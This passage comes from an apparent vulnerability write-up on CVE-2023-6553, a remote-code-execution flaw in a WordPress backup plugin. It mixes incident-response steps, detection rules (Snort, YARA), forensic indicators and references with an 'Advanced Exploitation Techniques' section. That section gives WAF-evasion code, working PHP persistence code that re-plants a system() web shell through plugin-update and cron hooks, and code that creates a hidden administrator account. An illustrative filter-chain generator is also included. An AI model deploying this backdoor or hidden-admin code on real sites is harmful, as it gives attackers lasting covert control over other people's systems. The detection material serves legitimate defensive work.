wp maintenance-mode deactivate

Phase 5: Lessons Learned

# Document incident
cat > incident_report_cve_2023_6553.txt << EOF
Incident: CVE-2023-6553 WordPress Backup Migration RCE
Date: $(date)
Affected System: target.com
Attack Vector: Unauthenticated RCE via PHP filter chain
Impact: [Document actual impact]
Root Cause: Vulnerable plugin version 1.3.7
Remediation: Updated to version 1.3.8, implemented WAF rules
Lessons Learned: [Document key takeaways]
EOF

Advanced Exploitation Techniques

Technique 1: Bypassing WAF Restrictions

# Obfuscate filter chains to evade signature detection
def obfuscate_filter_chain(payload):
    # Use alternative encoding combinations
    encodings = [
        'convert.iconv.UTF-8.UTF-16LE',
        'convert.iconv.ISO-8859-1.UTF-16',
        'convert.iconv.WINDOWS-1252.UTF-32BE'
    ]
    # Randomly select and chain encodings
    return generate_payload(payload, custom_encodings=encodings)

Technique 2: Persistence Mechanisms

// Implant persistent backdoor
<?php
// Auto-reinstall on plugin update
add_filter('upgrader_post_install', function($true, $hook_extra, $result) {
    file_put_contents(__DIR__ . '/backdoor.php', base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg=='));
    return $true;
}, 10, 3);

// Cron-based persistence
if (!wp_next_scheduled('backdoor_maintain')) {
    wp_schedule_event(time(), 'hourly', 'backdoor_maintain');
}
add_action('backdoor_maintain', function() {
    if (!file_exists(__DIR__ . '/backdoor.php')) {
        file_put_contents(__DIR__ . '/backdoor.php', '<?php system($_GET["c"]); ?>');
    }
});
?>

Technique 3: Privilege Escalation

// Create hidden admin account
<?php
$username = 'sysupdate';
$password = wp_generate_password(32, true, true);
$email = 'sysupdate@localhost.local';

if (!username_exists($username) && !email_exists($email)) {
    $user_id = wp_create_user($username, $password, $email);
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    
    // Hide from user list
    update_user_meta($user_id, 'show_admin_bar_front', 'false');
    update_user_meta($user_id, 'hidden_admin', 1);
}
?>

Timeline

  • 2023-12-11: Vulnerability discovered by Nex Team
  • 2023-12-11: Public disclosure and PoC release
  • 2023-12-11: CVE-2023-6553 assigned
  • 2023-12-12: Vendor (BackupBliss) notified
  • 2023-12-15: Patch released in version 1.3.8
  • 2023-12-18: Metasploit module published by jheysel-r7
  • 2024-01-05: Active exploitation observed in the wild
  • 2025-10-27: Continued exploitation attempts documented

References

Official Advisories

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-6553
  • WordPress Plugin Repository: https://wordpress.org/plugins/backup-backup/
  • WPScan Vulnerability Database: https://wpscan.com/vulnerability/6a4d0af9-e1cd-4a69-a56c-3c009e207eca

Technical Resources

  • PHP Filter Chain Technique: https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it
  • Original PoC: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py
  • Metasploit Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_backup_migration_rce.rb
  • PHP Stream Filters Documentation: https://www.php.net/manual/en/filters.php

Security Research

  • Synacktiv: PHP Filter Chains Research Paper
  • Ambionics Security: PHP Filter Chain Generator
  • RIPS Technologies: PHP Unsafe File Operation Analysis

Credits

Vulnerability Discovery: Nex Team
Proof of Concept: Valentin Lobstein (Chocapikk)
Metasploit Module: jheysel-r7 (Rapid7)
Documentation: DANG
CVE Assignment: MITRE Corporation
WPVDB ID: 6a4d0af9-e1cd-4a69-a56c-3c009e207eca


Appendix A: PHP Filter Chain Generator

#!/usr/bin/env python3
"""
PHP Filter Chain skeleton for CVE-2023-6553 (illustrative only)
Shows the shape of a Content-Dir payload. The returned chain is a fixed,
abbreviated prefix and does not embed the supplied PHP code.
"""

import base64


def generate_php_filter_payload(php_code):
    """
    Build an illustrative filter chain string in the Content-Dir format
    Args:
        php_code: PHP code (e.g., '<?php system("id"); ?>'); only its base64 form is computed
    Returns:
        Fixed filter chain string; not a working payload for the given code
    """
    # A real chain has to reproduce this base64 text byte by byte through iconv
    # conversions; here it is computed only to show the relationship and is not used
    encoded = base64.b64encode(php_code.encode()).decode()

    # Fixed prefix of the chain shown in the advisory (simplified example)
    filters = [
        'convert.iconv.UTF8.CSISO2022KR',
        'convert.base64-encode',
        'convert.iconv.UTF8.UTF7',
        'convert.iconv.UTF8.UTF16',
        'convert.iconv.WINDOWS-1258.UTF32LE',
        'convert.iconv.ISIRI3342.ISO-IR-157',
        'convert.base64-decode',
        'convert.base64-encode'
    ]

    # Construct the full filter chain
    filter_chain = 'php://filter/'
    filter_chain += '|'.join(filters)
    filter_chain += '/resource=php://temp'

    return filter_chain


# Example usage
if __name__ == '__main__':
    payload = '<?php system($_GET["cmd"]); ?>'
    print(generate_php_filter_payload(payload))

Appendix B: Detection Signatures

Snort Rules

alert tcp any any -> any $HTTP_PORTS (msg:"CVE-2023-6553 WordPress Backup Migration RCE"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  pcre:"/php:\/\/filter.*convert\.iconv/Hi"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:20236553; \
  rev:2;)

YARA Rules

rule CVE_2023_6553_WordPress_Backup_Migration_RCE {
    meta:
        description = "Detects CVE-2023-6553 exploitation attempts"
        author = "Security Team"
        date = "2023-12-11"
        reference = "CVE-2023-6553"
        
    strings:
        $header = "Content-Dir" nocase
        $filter = "php://filter" nocase
        $iconv = "convert.iconv" nocase
        $endpoint = "/backup-backup/includes/backup-heart.php"
        $base64 = "base64-encode" nocase
        
    condition:
        all of them
}

Appendix C: Forensic Artifacts

Common Webshell Locations

/wp-content/plugins/backup-backup/includes/shell.php
/wp-content/plugins/backup-backup/includes/x.php
/wp-content/plugins/backup-backup/includes/[a-z].php
/wp-content/plugins/backup-backup/includes/backdoor.php
/wp-content/plugins/backup-backup/includes/[random4chars].php

Suspicious Log Entries

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode...
User-Agent: python-requests/2.31.0

⚠️ DISCLAIMER: This document is provided for defensive security purposes, authorized penetration testing, and security research only. Unauthorized access to computer systems is illegal under computer fraud and abuse laws in most jurisdictions. The authors and distributors assume no liability for misuse of this information. This information should only be used on systems you own or have explicit written authorization to test.

RESPONSIBLE DISCLOSURE: If you discover instances of this vulnerability in production systems, please follow coordinated disclosure practices and notify the site owner and vendor before public disclosure.

LEGAL NOTICE: Exploitation of this vulnerability without authorization may violate laws including but not limited to: 18 U.S.C. § 1030 (Computer Fraud and Abuse Act), European Convention on Cybercrime, and local computer misuse legislation.

